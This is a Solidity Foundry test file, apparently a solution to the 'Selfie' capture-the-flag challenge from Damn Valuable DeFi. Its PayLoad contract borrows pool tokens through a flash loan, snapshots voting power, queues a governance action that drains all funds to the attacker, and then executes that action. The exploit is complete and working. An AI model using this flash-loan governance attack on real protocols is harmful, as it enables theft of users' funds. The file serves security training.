-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathSelfie.t.sol
90 lines (70 loc) · 2.97 KB
/
Selfie.t.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
// SPDX-License-Identifier: MIT
pragma solidity >=0.8.0;
import {Utilities} from "./utils/Utilities.sol";
import "forge-std/Test.sol";
import {DamnValuableTokenSnapshot} from "../DamnValuableTokenSnapshot.sol";
import {SimpleGovernance} from "../selfie/SimpleGovernance.sol";
import {SelfiePool} from "../selfie/SelfiePool.sol";
contract PayLoad{
address public attacker;
uint256 public actionId;
uint256 public constant falshloan_amount = 1_500_000e18;
DamnValuableTokenSnapshot public dvt;
SimpleGovernance public simplegovernance;
SelfiePool public selfiePool;
constructor (DamnValuableTokenSnapshot _dvtaddr, SimpleGovernance _simplegovernanceaddr, SelfiePool _selfiePooladdr) {
dvt = _dvtaddr;
simplegovernance = _simplegovernanceaddr;
selfiePool = _selfiePooladdr;
attacker = msg.sender;
}
function startAttack() public{
selfiePool.flashLoan(falshloan_amount);
}
function receiveTokens(address tokenAddr,uint256 amount) public {
bytes memory _func_sign = abi.encodeWithSelector(bytes4(keccak256("drainAllFunds(address)")), attacker);
dvt.snapshot();
(actionId) = simplegovernance.queueAction(address(selfiePool), _func_sign, 0);
dvt.transfer(address(selfiePool), amount);
}
}
contract Selfie is Test {
uint256 internal constant TOKEN_INITIAL_SUPPLY = 2_000_000e18;
uint256 internal constant TOKENS_IN_POOL = 1_500_000e18;
Utilities internal utils;
SimpleGovernance internal simpleGovernance;
SelfiePool internal selfiePool;
DamnValuableTokenSnapshot internal dvtSnapshot;
PayLoad internal payload;
address payable internal attacker;
function setUp() public {
utils = new Utilities();
address payable[] memory users = utils.createUsers(1);
attacker = users[0];
vm.label(attacker, "Attacker");
dvtSnapshot = new DamnValuableTokenSnapshot(TOKEN_INITIAL_SUPPLY);
vm.label(address(dvtSnapshot), "DVT");
simpleGovernance = new SimpleGovernance(address(dvtSnapshot));
vm.label(address(simpleGovernance), "Simple Governance");
selfiePool = new SelfiePool(
address(dvtSnapshot),
address(simpleGovernance)
);
dvtSnapshot.transfer(address(selfiePool), TOKENS_IN_POOL);
assertEq(dvtSnapshot.balanceOf(address(selfiePool)), TOKENS_IN_POOL);
}
//DamnValuableTokenSnapshot _dvtaddr, SimpleGovernance _simplegovernanceaddr, SelfiePool _selfiePooladdr
function testExploit() public {
vm.startPrank(attacker);
payload = new PayLoad(dvtSnapshot, simpleGovernance, selfiePool);
payload.startAttack();
utils.mineTime(2 days);
simpleGovernance.executeAction(payload.actionId());
vm.stopPrank();
verify();
}
function verify() internal {
assertEq(dvtSnapshot.balanceOf(attacker), TOKENS_IN_POOL);
assertEq(dvtSnapshot.balanceOf(address(selfiePool)), 0);
}
}